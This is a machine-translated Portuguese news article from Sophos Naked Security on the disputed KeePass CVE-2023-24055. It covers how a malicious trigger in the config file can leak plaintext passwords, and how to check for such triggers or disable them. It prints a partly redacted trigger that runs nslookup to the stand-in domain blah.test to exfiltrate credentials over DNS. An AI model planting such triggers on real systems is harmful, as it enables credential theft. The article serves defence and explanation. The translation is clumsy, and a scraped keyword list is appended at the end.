Foram algumas semanas dignas de nota para os gerenciadores de senhas - aqueles utilitários úteis que ajudam você a criar uma senha diferente para cada site que você usa e, em seguida, a controlar todos eles.
No final de 2022, foi a vez do LastPass estar em todos os noticiários, quando a empresa finalmente admitiu que uma violação sofrida em agosto de 2022 realmente acabou com a senha dos clientes cofres sendo roubados do serviço de nuvem onde eles foram copiados.
(As próprias senhas não foram roubadas, porque os cofres foram criptografados e o LastPass não tinha cópias da “chave mestra” de ninguém para os próprios arquivos do cofre de backup, mas foi um corte mais rente do que a maioria das pessoas gostou de ouvir.)
Então foi a vez da LifeLock estar em todos os noticiários, quando a empresa alertou sobre o que parecia ser uma erupção de ataques de adivinhação de senha, provavelmente com base em senhas roubadas de um site completamente diferente, possivelmente há algum tempo, e talvez compradas na dark web recentemente.
O LifeLock em si não foi violado, mas alguns de seus usuários sim, graças ao comportamento de compartilhamento de senhas causado por riscos que talvez nem se lembrem de terem corrido.
Os concorrentes 1Password e BitWarden também foram notícia recentemente, com base em relatórios de anúncios maliciosos, aparentemente veiculados involuntariamente pelo Google, que atraíram de forma convincente os usuários a replicar páginas de logon destinadas a phishing de detalhes de suas contas.
Agora é a vez de KeePass ser nas notícias, desta vez para mais uma questão de segurança cibernética: um suposto vulnerabilidade, o termo de jargão usado para bugs de software que levam a falhas de segurança cibernética que os invasores podem explorar para fins malignos.
A detecção de senha ficou fácil
Estamos nos referindo a ele como um vulnerabilidade aqui porque ele tem um identificador de bug oficial, emitido pelo Instituto Nacional de Padrões e Tecnologia dos EUA.
O bug foi apelidado CVE-2023-24055: O invasor que tem acesso de gravação ao arquivo de configuração XML [pode] obter as senhas de texto não criptografado adicionando um gatilho de exportação.
A alegação de ser capaz de obter senhas de texto não criptografado, infelizmente, é verdadeira.
Se eu tiver acesso de gravação aos seus arquivos pessoais, incluindo seus chamados %APPDATA%
diretório, posso ajustar sorrateiramente a seção de configuração para modificar quaisquer configurações do KeePass que você já personalizou ou para adicionar personalizações se você não tiver alterado nada conscientemente…
…e eu posso facilmente roubar suas senhas de texto simples, seja em massa, por exemplo, descarregando todo o banco de dados como um arquivo CSV não criptografado, ou conforme você os usa, por exemplo, definindo um “gancho de programa” que é acionado toda vez que você acessa um senha do banco de dados.
Note que eu não preciso Administrador privilégios, porque não preciso mexer no diretório de instalação real onde o aplicativo KeePass é armazenado, o que normalmente é proibido para usuários comuns
E não preciso de acesso a nenhuma configuração global bloqueada.
Curiosamente, o KeePass faz de tudo para impedir que suas senhas sejam descobertas quando você as usa, incluindo o uso de técnicas de proteção contra adulteração para impedir vários truques anti-keylogger, mesmo de usuários que já possuem poderes de administrador de sistema.
Mas o software KeePass também torna surpreendentemente fácil capturar dados de senha em texto simples, talvez de maneiras que você pode considerar “fáceis demais”, mesmo para não administradores.
Demorou um minuto para usar a GUI do KeePass para criar um Gatilho para executar toda vez que você copiar uma senha na área de transferência e definir esse evento para fazer uma pesquisa de DNS que inclua o nome de usuário e a senha em texto simples em questão:
Poderíamos então copiar a configuração XML não muito óbvia para essa opção de nosso próprio arquivo de configuração local para o arquivo de configuração de outro usuário no sistema, após o qual eles também descobririam que suas senhas vazaram pela Internet por meio de pesquisas de DNS.
Embora os dados de configuração XML sejam amplamente legíveis e informativos, o KeePass curiosamente usa sequências de dados aleatórios conhecidas como GUIDs (abreviação de identificadores exclusivos globalmente) para denotar os vários Gatilho configurações, de modo que mesmo um usuário bem informado precisaria de uma extensa lista de referência para entender quais gatilhos são definidos e como.
Aqui está a aparência do nosso gatilho de vazamento de DNS, embora tenhamos editado alguns dos detalhes para que você não possa fazer nenhum dano imediato apenas copiando e colando este texto diretamente:
XXXXXXXXXXXXXXXXXXXX cópia de Roubar coisas por meio de pesquisas de DNS XXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.teste Verdadeiro 1
Com esse gatilho ativo, acessar uma senha KeePass faz com que o texto simples vaze em uma pesquisa de DNS discreta para um domínio de minha escolha, que é blah.test
neste exemplo.
Observe que os invasores da vida real quase certamente embaralhariam ou ofuscariam o texto roubado, o que não apenas tornaria mais difícil detectar quando vazamentos de DNS estivessem acontecendo, mas também cuidariam de senhas contendo caracteres não ASCII, como letras acentuadas ou emojis, que não podem ser usados de outra forma em nomes DNS:
Mas é realmente um bug?
A questão complicada, porém, é: “Isso é realmente um bug ou é apenas um recurso poderoso que pode ser abusado por alguém que já precisaria de pelo menos tanto controle sobre seus arquivos privados quanto você mesmo?”
Simplificando, é uma vulnerabilidade se alguém que já tem o controle de sua conta pode mexer em arquivos que sua conta deveria poder acessar de qualquer maneira?
Mesmo que você espere que um gerenciador de pssword inclua muitas camadas extras de proteção contra adulteração para tornar mais difícil o abuso de bugs/recursos desse tipo, CVE-2023-24055 realmente ser uma vulnerabilidade listada no CVE?
Nesse caso, comandos como DEL
(excluir um arquivo) e FORMAT
precisam ser “bugs” também?
E não seria a própria existência do PowerShell, que torna o comportamento potencialmente perigoso muito mais fácil de provocar (tente powerhsell get-clipboard
, por exemplo), ser uma vulnerabilidade própria?
Essa é a posição de KeePass, reconhecida pelo seguinte texto que foi adicionado ao detalhe do “erro” no site do NIST:
** CONTESTADO ** […] NOTA: a posição do fornecedor é que o banco de dados de senhas não se destina a ser seguro contra um invasor que tenha esse nível de acesso ao PC local.
O que fazer?
Se você é um usuário independente do KeePass, pode verificar se há gatilhos desonestos como o “DNS Stealer” que criamos acima, abrindo o aplicativo KeePass e examinando o Ferramentas > Gatilhos… janela:
Observe que você pode transformar todo o Gatilho sistema fora desta janela, simplesmente desmarcando o [ ] Enable trigger system
opção…
…mas essa não é uma configuração global, portanto, pode ser reativada por meio do arquivo de configuração local e, portanto, apenas protege você contra erros, e não contra um invasor com acesso à sua conta.
Você pode forçar a desativação da opção para todos no computador, sem a opção de desativá-la, modificando o arquivo global de "bloqueio" KeePass.config.enforced.XML
, encontrado no diretório onde o próprio programa de aplicativo está instalado.
Os gatilhos serão desativados para todos se o arquivo de imposição XML global for semelhante a este:
falso
(Caso você esteja se perguntando, um invasor que tenha acesso de gravação ao diretório do aplicativo para reverter essa alteração quase certamente teria poder suficiente no nível do sistema para modificar o próprio arquivo executável do KeePass ou para instalar e ativar um keylogger autônomo de qualquer maneira.)
Se você é um administrador de rede encarregado de bloquear o KeePass nos computadores de seus usuários para que ainda seja flexível o suficiente para ajudá-los, mas não flexível o suficiente para ajudar os cibercriminosos por engano, recomendamos a leitura do KeePass Problemas de segurança página, o gatilhos página, e o Configuração forçada Disputas de Comerciais.
- Conteúdo com tecnologia de SEO e distribuição de relações públicas. Seja amplificado hoje.
- Platoblockchain. Inteligência Metaverso Web3. Conhecimento Ampliado. Acesse aqui.
- Fonte: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Capaz
- Sobre
- acima
- absoluto
- Acesso
- acessando
- Conta
- ativo
- adicionado
- admitiu
- anúncios
- Depois de
- contra
- Todos os Produtos
- alegado
- já
- e
- Outro
- app
- Aplicação
- AGOSTO
- autor
- auto
- em caminho duplo
- Apoiado
- background-image
- backup
- baseado
- Porque
- ser
- fronteira
- Inferior
- violação
- Bug
- erros
- capturar
- Cuidado
- casas
- causado
- causas
- Centralização de
- certamente
- alterar
- caracteres
- verificar
- escolha
- reivindicar
- mais próximo
- Na nuvem
- cor
- como
- Empresa
- completamente
- computador
- computadores
- condições
- Configuração
- Considerar
- ao controle
- cópias
- poderia
- cobrir
- crio
- criado
- cve
- cibercriminosos
- Cíber segurança
- Perigoso
- Escuro
- dark web
- dados,
- banco de dados
- detalhes
- DID
- diferente
- diretamente
- Ecrã
- dns
- domínio
- não
- down
- apelidado
- mais fácil
- facilmente
- ou
- criptografada
- aplicação
- suficiente
- Todo
- Mesmo
- Evento
- Cada
- todos
- exemplo
- Explorar
- exportar
- extenso
- extra
- Característica
- poucos
- Envie o
- Arquivos
- Finalmente
- Encontre
- flexível
- seguinte
- força
- encontrado
- da
- ter
- obtendo
- Global
- vai
- acessível
- feliz
- ter
- altura
- ajudar
- SUA PARTICIPAÇÃO FAZ A DIFERENÇA
- Buracos
- esperança
- pairar
- Como funciona o dobrador de carta de canal
- Contudo
- HTML
- HTTPS
- identificador
- Imediato
- in
- incluir
- incluído
- Incluindo
- informativo
- instalar
- instância
- Instituto
- Internet
- emitem
- Emitido
- IT
- se
- jargão
- Guarda
- conhecido
- largamente
- LastPass
- camadas
- conduzir
- vazar
- Vazamentos
- Nível
- Lista
- local
- olhou
- OLHARES
- pesquisa
- moldadas
- fazer
- FAZ
- Gerente
- Gerentes
- Margem
- max-width
- poder
- erro
- erros
- modificar
- a maioria
- nomes
- Nacional
- você merece...
- rede
- notícias
- nist
- normal
- obter
- oficial
- abertura
- Opção
- de outra forma
- próprio
- parâmetro
- Senha
- senhas
- Paul
- PC
- Pessoas
- possivelmente
- pessoal
- Phishing
- Texto simples
- platão
- Inteligência de Dados Platão
- PlatãoData
- posição
- POSTAGENS
- potencialmente
- poder
- poderoso
- atribuições
- PowerShell
- privado
- privilégios
- provavelmente
- Agenda
- comprado
- fins
- colocar
- questão
- acaso
- erupção
- Leitura
- recentemente
- recomendar
- regular
- lembrar
- responder
- Informou
- Relatórios
- reverso
- riscos
- Execute
- Seção
- seguro
- sentido
- serviço
- conjunto
- contexto
- Configurações
- Baixo
- rede de apoio social
- simplesmente
- So
- Software
- sólido
- alguns
- Alguém
- Spot
- autônoma
- padrões
- Ainda
- roubado
- Dê um basta
- armazenadas
- tal
- suposto
- SVG
- .
- Tire
- técnicas
- Tecnologia
- A
- deles
- si mesmos
- assim sendo
- Através da
- tempo
- para
- também
- topo
- pista
- transição
- transparente
- desencadear
- verdadeiro
- VIRAR
- Virado
- tipicamente
- único
- URL
- us
- usar
- Utilizador
- usuários
- utilitários
- vário
- Cofre
- cofres
- via
- vulnerabilidade
- W3
- maneiras
- web
- Site
- semanas
- O Quê
- qual
- QUEM
- precisarão
- perguntando
- Atividades:
- seria
- escrever
- XML
- investimentos
- você mesmo
- zefirnet